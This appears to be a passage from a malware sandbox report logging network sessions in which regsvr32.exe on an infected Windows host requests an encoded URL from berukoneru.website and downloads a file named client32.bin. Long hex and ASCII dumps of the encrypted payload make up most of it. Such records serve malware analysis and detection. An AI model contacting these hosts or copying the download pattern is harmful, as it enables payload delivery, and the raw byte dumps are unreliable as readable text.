                          2021-12-14 09:34:08 UTC1678INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                          Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                          2021-12-14 09:34:08 UTC1694INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
                          Data Ascii: #B:kt/B|".>R(=127crA9$$m6>O"6/Ak]o}4UV%[\W07BoDRG$"Krq)9LXZDIV{TY@~X8"R]F=@h&?'{o #OfK>T{wP~cOI


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          6 | 192.168.2.5 | 49801 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:07 UTC | 1101 | OUT | GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC | 1134 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=brv6hst5is03pld8n10nk7l6i7; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1134INData Raw: 58 1b 91 63 b8 aa 05 14 26 b5 4a 87 75 c1 a0 26 9e 3c 11 6e 71 42 96 26 99 7a 08 52 54 2f 31 7f 58 90 87 ef 21 eb 4d ac aa 62 d0 f5 9e 65 dd b1 86 a9 14 c8 ae 98 d4 b6 d6 60 d1 47 77 cd be 8c 6e b1 66 d1 e8 7a 10 1e c8 8c 97 db c5 0f 0b 40 05 e7 84 c2 c8 34 df 33 e6 dc 52 e3 46 f4 95 b7 af 93 01 65 a9 71 60 bf 1f 51 95 4a f0 de 35 3e 05 cd 02 6e e9 85 80 bb d0 9e 8a 75 b1 3b 1e 78 47 1f 6b 12 e2 6d 4a 11 60 95 cc b0 70 f1 9e 77 55 2f 09 91 10 e8 d7 e3 05 c1 1d c9 ea 2f 96 3d 82 e8 0e ae b5 77 75 a5 0d bc 2f f1 b6 c5 47 94 e1 2d 77 eb d0 a1 8b a7 ad 18 90 fa 77 82 10 81 a4 59 32 4a 80 82 20 cd 7d 1d 20 6f 17 d7 8e 41 9a d0 fb 32 98 6c 3b da 81 8e 51 5e cb e0 92 a7 47 9a 9d c8 4d ed 20 99 cb 03 c1 2b 49 00 fa b7 08 c4 02 c1 94 c4 b3 eb 0b 87 5e bf 36 f0 75
                          Data Ascii: Xc&Ju&<nqB&zRT/1X!Mbe`Gwnfz@43RFeq`QJ5>nu;xGkmJ`pwU//=wu/G-wwY2J } oA2l;Q^GM +I^6u
                          2021-12-14 09:34:08 UTC1150INData Raw: 53 07 cb b8 4e 62 9c b0 52 21 3d c4 3d 76 91 43 af 38 7c 50 14 41 e7 bd 39 dd 41 f5 8b 56 ab fc e5 6d c6 be ea b9 6f ac 49 c3 e4 fc 2c 2e 24 77 88 18 d0 d6 0d e2 48 70 d9 46 b0 89 af 38 9c 24 3c b1 b0 63 e5 b0 08 90 17 71 54 ef f8 87 9d 1e 42 a7 fd 9a 63 c3 82 40 5b b8 56 fe 88 58 4d 03 7b 4a c1 3e 01 55 8d a2 04 94 51 bf c3 70 6b d2 e2 08 64 3d df 31 53 f8 f6 69 5e 2b 60 1e 2f 64 eb a0 41 2e cb 53 06 1f a2 63 54 77 f5 61 29 3a 5a fb 59 8c ff 2a c8 82 0d 0a b0 a7 75 fb 71 92 04 b8 69 03 b4 45 51 d3 95 71 f0 db 15 b4 fb c5 0d 33 ef a0 0b 56 c4 42 43 9e a7 a1 d1 7f 09 fe c9 cc 52 6e cb 80 08 2a 8e a8 9e fd e5 c4 23 ad ed bd 3e 84 71 6f 32 b7 23 76 bd f0 aa 04 aa 58 67 b0 ae 2d e0 9e 97 be 39 61 1a 42 24 de 9f 09 a5 12 54 85 a1 89 71 fa a7 21 f9 6e ff 48 25
                          Data Ascii: SNbR!==vC8|PA9AVmoI,.$wHpF8$<cqTBc@[VXM{J>UQpkd=1Si^+`/dA.ScTwa):ZY*uqiEQq3VBCRn*#>qo2#vXg-9aB$Tq!nH%
                          2021-12-14 09:34:08 UTC1246INData Raw: e7 b0 40 b0 31 3b 8f 49 34 9e 9d 07 a7 2a 47 1a 98 b8 bb ef 61 5f ed 3e 4c 3b 59 ec 5e 3a 76 d9 c1 67 5c 2e 34 de 0d 85 63 85 90 eb e4 ee a5 b8 ce e5 27 ab ed f1 46 e0 2a 79 16 27 a9 fc b8 cf 65 bb bf d4 90 e2 e0 3c 0b de e6 54 f2 ef 2e be 6b fc 2c 61 d4 bc bc 78 9e 57 3a 13 f3 b3 15 e0 74 c2 74 c3 e1 7a b9 e4 c1 3b 07 41 66 37 d9 18 e3 65 ba 35 bd 4f 40 fc 90 eb c9 45 3c ed ba 8f 96 10 0b e4 14 da a9 b8 8c 11 b2 96 cf a0 6d af e4 4f c4 a4 69 fd f3 64 92 ef 16 b1 cf c1 d4 e9 4f 21 c8 1b 40 8e f5 06 bb 3f a1 f0 76 28 07 ee 59 f8 cd 20 06 01 fd e9 a0 fc 2d ee dc 88 96 0b 46 af a1 33 eb a0 c7 4e a9 5c 03 33 28 8c ca 8f d8 6c 19 1d 8f 80 97 7e b9 38 71 06 4f 9b c4 2d f9 c3 af 26 49 23 e0 0a 10 0e 09 e0 18 f6 ae d4 cb 86 15 1d 08 c5 ff e8 8d 3d 16 53 16 b4 c9
                          Data Ascii: @1;I4*Ga_>L;Y^:vg\.4c'F*y'e<T.k,axW:ttz;Af7e5O@E<mOidO!@?v(Y -F3N\3(l~8qO-&I#=S
                          2021-12-14 09:34:08 UTC1262INData Raw: 45 db 6c 2a 63 aa 06 70 d0 6b 08 5b 47 fa c5 46 f3 38 99 a1 5d cc ba 11 e3 7e a5 1e 73 fb a9 d1 cb a2 38 03 98 b3 a6 13 bd fa 0c bd cb 3d 30 a4 92 94 e1 ea ba 97 05 66 b9 79 98 c6 56 aa 73 54 58 3d c0 60 d7 30 76 6d 4f e1 cb d0 a7 7b 54 a9 1f f1 d3 15 64 69 54 3b 42 6f a0 02 ae 6e 26 9b 48 e2 07 8c cb 20 9e b8 e7 5f b5 44 63 51 8f cc 68 40 45 da 42 e1 26 c3 48 56 35 4f 6e c9 96 89 0c c7 f1 ba 24 ba 83 f0 45 05 98 ec 4a 92 f6 f3 44 8a 27 ff 23 80 ae 70 e7 ea 9f cb 0a ab 3f 5e 7f 1f 38 05 43 d0 fd 66 cf ed 46 fd dc 7c 23 bc bd 8c 68 7d 4d 99 6f e0 32 34 87 aa c5 a8 35 09 d2 c7 60 38 ac 2d 95 b3 ee 1f c1 52 22 e6 12 b0 07 3f a8 53 75 fa ff cb b8 9a ac c4 ce 88 1b 59 1d 72 ab a4 6b 2b 17 94 74 4b 8e 70 9e 76 ff 8b 6c 0c 30 0b 09 54 f3 70 a5 8a aa 43 01 be 96
                          Data Ascii: El*cpk[GF8]~s8=0fyVsTX=`0vmO{TdiT;Bon&H _DcQh@EB&HV5On$EJD'#p?^8CfF|#h}Mo245`8-R"?SuYrk+tKpvl0TpC
                          2021-12-14 09:34:08 UTC1278INData Raw: b9 b3 89 36 a0 10 70 11 ee 76 04 aa f4 39 8a 26 d4 29 d7 d0 ba bb d2 9e ff 36 cc f6 8b 3a 1a f6 f1 07 b3 88 26 61 19 fa 05 f4 86 56 44 b7 bb d2 49 24 96 90 b9 8d a7 e0 88 c2 e4 b3 80 23 5a 22 bf 34 49 c2 2b 10 c7 df 0e e7 7d b2 2c 46 10 12 fa 63 8d 6c 77 94 24 a1 1f 78 d0 cc 65 5b 7c 8a d7 ba 5e 54 fe e7 bf a4 3a f2 31 5a 79 3e a4 48 aa 3d d5 6a ee a2 62 1e 62 a8 4c 65 ce 69 6b 81 6e e1 9e 3c 50 8d 5b bf 47 41 9f a8 b8 98 6f 92 de 70 83 81 ea ef e4 df c4 31 d6 84 a7 5d 99 6f 78 56 b8 1c f8 44 db b5 1d a0 95 e6 0c 26 aa 44 86 22 aa 52 ae 80 ee f4 41 9c 26 7c 67 ed a8 4e 37 b5 7e f6 f0 ea ce 5f c5 06 cb 55 9c 65 9e c7 e8 00 a6 00 43 1a f8 e2 6f 8e 1e 8c 65 88 0b 33 05 85 4a 32 5e 64 82 e4 67 70 43 e5 fc d0 07 dd 85 66 6d 6b 0c 68 07 1f 46 f8 ba c6 55 80 cf
                          Data Ascii: 6pv9&)6:&aVDI$#Z"4I+},Fclw$xe[|^T:1Zy>H=jbbLeikn<P[GAop1]oxVD&D"RA&|gN7~_UeCoe3J2^dgpCfmkhFU
                          2021-12-14 09:34:08 UTC1438INData Raw: 78 71 76 31 33 bc b7 0d c3 de 27 b9 e0 41 88 eb d3 68 96 04 e0 a3 0b 36 53 fd 2a 4d 2f 82 25 1c 70 e4 3f df 1e b6 ee 36 26 e8 83 d9 db 55 4a 5f 9e fb 35 bd 90 d8 cf e2 60 85 21 8a ca e3 72 a8 a1 08 41 78 fc 7c 2c 27 f4 20 a9 b9 fd 24 f1 24 3f fe 94 22 1f 4a a2 89 18 ac ac 87 3a b3 37 10 5d f7 83 1a 75 a9 ca d7 19 08 20 be 46 78 23 ed 7e 89 c7 b2 59 87 53 ec 33 70 85 97 13 b5 7b 44 20 9b 67 94 ea 69 ac ac 4d db 54 a3 61 cf a9 0d d8 10 67 82 3d 2b d5 9c 21 be 3f e2 16 18 9d e4 78 52 a4 7d c6 8a 77 73 ce 0f b4 37 7f ca a5 b1 be 65 af f7 f4 af 6b a3 bd c2 a1 b2 f9 52 59 8c bd d6 6d 1b 49 59 57 cb 23 8f 9f cb 4a a3 12 7c 63 ae 4c d0 f6 f5 da 3d f5 51 94 3f bb e3 b9 56 cd 1e 4a 19 99 fa 31 9b a4 51 ac 78 89 24 c2 e1 9f c5 ab 4d 38 7d 98 e0 38 fc 6d fb 7f d9 88
                          Data Ascii: xqv13'Ah6S*M/%p?6&UJ_5`!rAx|,' $$?"J:7]u Fx#~YS3p{D giMTag=+!?xR}ws7ekRYmIYW#J|cL=Q?VJ1Qx$M8}8m
                          2021-12-14 09:34:08 UTC1454INData Raw: b4 60 44 97 27 1f 21 1f d0 2f ee 48 10 3e c5 6c 33 ba ab 56 30 71 11 00 92 c5 c1 bc 66 45 ac 84 d1 09 08 c1 a4 6e fa a9 3d bd 53 ba 60 d9 86 1f 61 02 41 f1 b4 f1 a3 4e 1f fb 49 76 1a 69 04 18 96 d5 40 41 0f 01 30 43 c5 3a 64 c0 69 40 59 d0 79 72 63 bf 4e b6 d6 5f 07 58 61 f7 90 a4 f9 08 c9 da 62 84 96 47 39 af 7a 24 a8 3f 44 47 80 46 6e 86 1b c4 f1 8b 20 c8 b5 ff 9d 59 83 72 67 dc 53 42 27 f8 dd 5c f8 ec 3f f3 9d df 40 c3 59 19 b9 61 5d 0a d0 76 4a ba fe cb 76 15 05 42 32 43 76 df 71 a5 91 73 4c 46 d6 87 eb c9 66 a6 96 7b 6d fe f6 ca de ff 88 d0 f6 e9 f5 04 48 89 18 70 91 a4 2b 83 db 4b d3 1c 1c f5 ba 0f d9 39 57 5a 1f 17 c4 00 79 61 af a5 a6 0e a0 e8 de a4 96 86 bf bd 5b f9 2d 27 92 80 fe 63 93 0c b5 49 f5 38 79 ac 61 63 9c 01 f1 ee df 76 f8 e5 83 7e 57
                          Data Ascii: `D'!/H>l3V0qfEn=S`aANIvi@A0C:di@YyrcN_XabG9z$?DGFn YrgSB'\?@Ya]vJvB2CvqsLFf{mHp+K9WZya[-'cI8yacv~W
                          2021-12-14 09:34:08 UTC1470INData Raw: c6 16 99 f3 a4 fe 24 ea 90 c4 e0 29 ca cb 52 bf 65 c0 7a cb 51 b2 b2 b7 57 79 73 38 52 ba 5a bc 4c 22 40 1d 19 b5 1c 82 37 66 72 7a 08 22 07 27 40 84 8b 5e f6 28 53 e6 b4 ec 9b 67 a1 a7 03 8f 6c 4a 4d 12 c3 da 7e a8 53 51 f8 cd 89 8c b9 52 85 a1 d8 01 df 09 06 ee 13 00 0e a7 70 26 89 41 da 6d fb db 2f af 16 ad 02 d5 29 0a 4e cf c2 35 b6 0a 26 11 b4 f5 f2 82 4b dd b8 84 a8 aa 2a c9 ca 48 c4 34 61 bb 76 c0 de cb 0c 5c 8b c7 9f 3b 49 17 4c f5 8b dd 7a c1 0b 4a 35 d0 be ab f7 e6 a7 43 03 6e 29 c7 df 2d b0 79 31 f8 86 19 32 81 8e e0 4f 45 87 07 89 46 26 9a 65 b3 76 6f 12 77 fd 5d b6 98 f7 39 4f 6f 57 e1 a1 da 5f 6b 71 53 ad f0 06 c4 15 97 4e 02 e0 c3 33 22 01 d7 19 f4 6f 3d de 8d d9 4c 13 c8 e0 95 12 74 55 73 72 a5 5f 83 9d 74 b1 5b d4 c0 73 ee 7d 1f bf 73 a7
                          Data Ascii: $)RezQWys8RZL"@7frz"'@^(SglJM~SQRp&Am/)N5&K*H4av\;ILzJ5Cn)-y12OEF&evow]9OoW_kqSN3"o=LtUsr_t[s}s
                          2021-12-14 09:34:08 UTC1486INData Raw: 8a 95 bf 32 84 5e 76 15 88 cd 1f 9d d9 af 1b 24 c9 22 47 79 35 37 09 c6 d8 7e 27 47 2e 10 a1 b3 5b 24 c7 aa a8 03 00 c5 f4 aa 54 55 49 85 5b 49 b2 cc a2 5a ff 21 cd f5 b2 48 99 9f 29 da 5e f5 ee 59 21 b3 7a 12 71 e8 77 cd 3b 1f a7 84 6b dd 6e 75 68 60 c1 ea 3c c3 d4 41 9a fe ae e6 34 bc 08 a1 46 64 26 66 4c 90 ed 50 d9 be c6 d5 7a 2c d9 b2 5a e4 f8 f8 8d 45 b3 2c 15 2c ad de c1 5a fd 4e 28 de 6a e9 ff c0 fd 35 e9 57 90 7c 6b b6 ea 1a 5a b1 76 15 34 93 69 f2 35 55 5a 0b 18 cd 6c f7 aa 27 6d 48 5c c9 9a d8 8f 58 c3 f7 bc bc 0f 9b 2c 71 e8 01 14 70 24 ed 50 5c 6f f5 1e b0 11 fd 45 15 69 45 3d 3a f5 85 b8 64 94 bb 5e 33 9c 63 8a 60 52 7f 2f 5d 5f e7 5b 8a 81 02 98 a6 97 ae 88 75 55 72 18 63 80 fc da 9e 79 b4 4f db e3 38 dd 8a df 4f ca 3f 74 56 fe 61 02 7f 87
                          Data Ascii: 2^v$"Gy57~'G.[$TUI[IZ!H)^Y!zqw;knuh`<A4Fd&fLPz,ZE,,ZN(j5W|kZv4i5UZl'mH\X,qp$P\oEiE=:d^3c`R/]_[uUrcyO8O?tVa
                          2021-12-14 09:34:08 UTC1502INData Raw: a8 d4 95 b0 78 6a 51 c3 88 29 00 f7 a0 84 fe 40 04 18 2e ef 9c 27 9d fe 2e 7f 57 0f 47 7e 58 ad fd 7d c9 6e 23 3f 22 b2 a4 9f ed 28 62 16 d7 bc fb 23 4a 86 93 35 4e ab fa bc e6 cd f5 3f 33 fb 84 70 77 8d 54 5d a3 de 9f 6b 30 00 f1 82 7c dc 5f f2 1d 45 f3 19 55 be 0c 4c 1c 0e 7e fb f7 32 ed 48 d6 a1 49 ec 55 42 6d 91 57 f7 df b4 1a 0d b6 af 23 6b 5e d1 e5 f5 65 ba a7 5b 33 e1 0e 26 21 79 08 33 73 6b 85 13 c2 2a b4 92 5f db 48 5b c1 22 1e 4b cc 13 e8 7a a3 ed d6 6e 4e e8 f6 e4 cd b4 ab d2 6c 6c dc 9b 46 e1 b4 59 87 7d 59 de 09 28 18 da b7 a3 db 92 78 c3 bb cf e4 db bb 9b c8 20 82 fc e2 7b 61 40 74 fa 59 a4 48 a2 bd 7a 16 d5 4a 04 f5 dc 5d 96 8d 8e a4 60 4b d6 da 45 0d a5 7d 4a 3f c7 4a 7d 82 53 c3 fa 18 71 d6 d5 c7 21 14 7c bc 89 7c d8 6b b0 7e 18 fe 07 31
                          Data Ascii: xjQ)@.'.WG~X}n#?"(b#J5N?3pwT]k0|_EUL~2HIUBmW#k^e[3&!y3sk*_H["KznNllFY}Y(x {a@tYHzJ]`KE}J?J}Sq!||k~1
                          2021-12-14 09:34:08 UTC1518INData Raw: be be 49 af 90 c1 30 31 45 7a 23 e6 e4 04 bb 3c a2 06 4d f2 c4 c5 26 f4 3b 9c 27 4f 3f 93 20 5e bb eb 62 2c 47 6b 9f 9b 2c d2 e3 6c 68 75 33 14 4b 09 e4 a1 64 f8 e4 83 d8 d3 e4 53 bb 01 67 f0 22 4f 96 18 4f 58 c1 85 55 48 6a 11 21 5e dd ec d1 97 0d 2a 8f 36 16 ff 64 b9 84 84 3c 79 1b 07 62 23 c8 35 8d bc 67 25 a8 18 64 c1 39 82 33 c8 b2 80 86 30 f6 29 f4 b5 b6 5f 4e db c4 ec 85 2e 27 ea d7 85 3e 83 83 d7 a9 77 90 36 b4 a0 4a 77 61 92 70 be ad a8 f5 af 1a 1a 25 1d 49 5e 6f ba a2 8f 2f de 33 8e fc 35 7c e6 72 f6 dd 98 36 e1 39 09 3d 7e b0 76 1f cd 44 7d 44 f5 30 af 1c 8c d8 1b 21 f2 ee 9f 0f 55 2b 2c 63 fb 6e 23 e0 db 15 62 b0 e6 58 39 83 be 59 c0 47 8e d9 a8 ec 90 d7 8d 20 b1 e1 52 0c 48 ce 55 3d 91 82 8f 5b 21 6b 1b 05 9f fc c0 25 33 91 d4 d9 df 43 5b 44
                          Data Ascii: I01Ez#<M&;'O? ^b,Gk,lhu3KdSg"OOXUHj!^*6d<yb#5g%d930)_N.'>w6Jwap%I^o/35|r69=~vD}D0!U+,cn#bX9YG RHU=[!k%3C[D
                          2021-12-14 09:34:08 UTC1534INData Raw: d6 fa 44 6c f8 d1 11 bb c5 65 a2 b5 38 a6 07 d5 c6 7c 71 ca 80 c3 34 7e 53 c8 15 31 2d 39 36 14 a4 d2 38 de 0a c7 1a 30 94 6f 5e b4 cd a6 2a bf 96 98 9f 38 d0 8a fa ee 97 38 34 6e d6 b9 9d b4 c4 b5 67 d8 1f 07 13 81 d4 ac 50 57 fd 2e 62 f2 6c f0 b5 95 d6 64 ec 7e 6c f9 19 f3 7d d7 6b ff a1 f2 67 fe 49 6c 0f 94 fc ba 1d 91 de 22 cc bb 6a e5 62 5f d2 90 f7 81 62 d5 65 f5 65 e2 c2 33 fb cf 2a 9b e2 0f cd 79 34 37 96 43 77 f3 2e 74 b4 7b df b2 d0 fc 5b 53 32 8e 6b 00 b9 ba 0b da f1 fb b0 43 f9 cd ec e7 5d 31 ab 8f 07 25 90 ea f3 ae 6d 36 9c 82 ea df 9a 6d 22 ee e5 74 fb bf d0 69 75 c1 f8 cd a5 56 65 94 8e c7 29 4d 83 de d3 14 0a 3a 79 8f e3 32 30 36 7c af 34 fc 97 c1 9e 01 27 38 87 51 4c 45 2d 05 b4 d2 c9 6e b3 f3 49 7b 47 76 60 cb d2 b4 8d 67 96 ff 7c b6 e4
                          Data Ascii: Dle8|q4~S1-9680o^*884ngPW.bld~l}kgIl"jb_bee3*y47Cw.t{[S2kC]1%m6m"tiuVe)M:y206|4'8QLE-nI{Gv`g|
                          2021-12-14 09:34:08 UTC1748INData Raw: 4b 4a 7e 32 f6 73 45 d5 ff f6 fc bf 13 4b 42 84 a3 0e c2 b2 76 46 78 8b fc d9 4f 81 7a 06 43 3f 27 a3 1a 09 fb 94 90 13 bf 09 81 aa 88 1d ec 67 29 52 5d 88 5c 4d 0e ad f8 c6 d7 d1 95 fe 9a 0e 65 45 7b a6 89 93 24 93 52 a1 81 b9 6d 1d ef 25 bb 29 6c 81 06 bf c7 5f 51 9b e9 3e 78 89 47 47 ab 4b 3d 15 22 4f 21 80 3d 77 b1 bc 5e 75 c2 49 92 e6 79 fe ba 7f af 13 aa 23 47 10 4f 82 94 97 51 c3 fc aa 3e 7c 34 82 b0 ac 44 bc de ab ae cc a5 29 b8 ad 09 ba 0e 7b 51 fe 91 81 5a 19 8f 57 5a f9 a8 ae 61 75 e1 13 42 a4 59 c4 c5 7e 7c 59 9a 76 8c cf 66 89 1b bc b9 41 1b c1 61 40 18 0e f5 8f e3 3f 5f 32 4f 56 af a5 bf 17 78 b6 3b 97 ec 5b bc 1e 06 79 33 e2 4f bc ee 17 a8 1a c9 0d e3 91 19 e0 11 f2 6a 6a 6e 85 77 f3 7a cc fd f0 dc 74 ed eb 91 6f d8 20 a1 ad ad 9e 93 ec 11
                          Data Ascii: KJ~2sEKBvFxOzC?'g)R]\MeE{$Rm%)l_Q>xGGK="O!=w^uIy#GOQ>|4D){QZWZauBY~|YvfAa@?_2OVx;[y3Ojjnwzto
                          2021-12-14 09:34:08 UTC1764INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                          Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                          2021-12-14 09:34:08 UTC1780INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                          Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
                          2021-12-14 09:34:08 UTC1796INData Raw: ad b5 bb ed 0d 6f fe 1f 7f 86 8f fb 11 eb f2 40 6d 1f 14 53 43 51 28 3f e7 0a 47 d5 db cd c8 70 8a e8 da 39 bb c0 6f 0b 3a 21 73 c2 e0 f8 2d a1 9f d2 32 5c 95 c8 01 fa 0e 55 44 86 da 31 1e 25 36 8a 46 a6 4a b6 37 f5 5b 7f de 73 86 05 1c f7 e5 c9 e8 6a 18 f5 11 36 a4 87 e6 8a 1b 07 8c 6f eb dd 08 40 37 d2 2d d1 b5 fa 1f dd d0 aa 6f 1d 50 27 42 11 01 ef ef e7 bb ad 89 dd d2 88 38 ba 99 fe 1f 7e 61 a4 50 4b b8 9f 34 43 ba 83 bf 27 f6 98 90 eb 3e c5 da 90 dd 8f a8 de ee 1e ee a6 57 4c 7f 14 48 c6 be 8a f8 14 ac 55 17 3f 05 01 b0 57 b9 2a eb 92 d8 7c 14 f2 7f 2d 2c 0f e5 44 eb 89 ca e5 0e 49 b3 c7 ec af 37 30 17 6e d6 7f 0f 3e a1 1d 9b c4 a4 41 e8 06 f5 59 3a 34 f9 9b 4c a6 fa 47 19 14 3a 2b e6 6a 3d 17 ad 5e 14 57 8b 5d 98 74 f3 f5 eb 21 33 1a 25 e4 69 5a b5
                          Data Ascii: o@mSCQ(?Gp9o:!s-2\UD1%6FJ7[sj6o@7-oP'B8~aPK4C'>WLHU?W*|-,DI70n>AY:4LG:+j=^W]t!3%iZ
                          2021-12-14 09:34:08 UTC1812INData Raw: 23 42 3a 98 04 6b 9e 98 bf 84 15 9c 74 2f 09 42 c9 7c b7 bd c7 ab ec d1 22 f0 c8 c9 b2 2e 13 3e c8 52 28 8d 3d ed 31 bc 32 e3 bb 37 82 f9 c5 c7 92 63 a2 72 41 39 e0 24 a7 24 6d 36 be 05 96 c3 05 da 3e 4f ef fd a6 f3 22 36 fa 2f 41 c8 fa 8f 6b fb 5d 6f 7d f5 34 eb 55 56 e6 d8 15 9b 25 f1 ce 5b c8 be 00 d9 09 05 fc b1 5c 17 08 57 cd d0 8a 30 84 9d af 37 c7 99 e3 42 6f 44 85 bc 07 52 f3 47 24 f5 b1 b5 e4 ca 8a 22 4b 81 72 71 29 39 4c 58 0e b9 5a 1f 44 81 a9 db 49 d4 8f 8c 56 7b 54 0d df bd 59 80 40 99 b8 85 7e 9e 15 a6 58 a6 ac 38 13 22 89 c4 cd 01 1a 8b 52 be bd 5d db 46 3d b8 b5 b6 9d 40 68 a2 d1 26 d5 3f d5 8a 27 7b 6f 14 a1 20 23 f6 81 dd 0c d5 9c a5 4f 93 66 ff 4b c4 d1 3e 54 be ed 1e 89 fc e4 0e aa 7b 1d 06 a6 c4 77 50 7e 63 97 4f bd 49 b6 ab 17 05 84
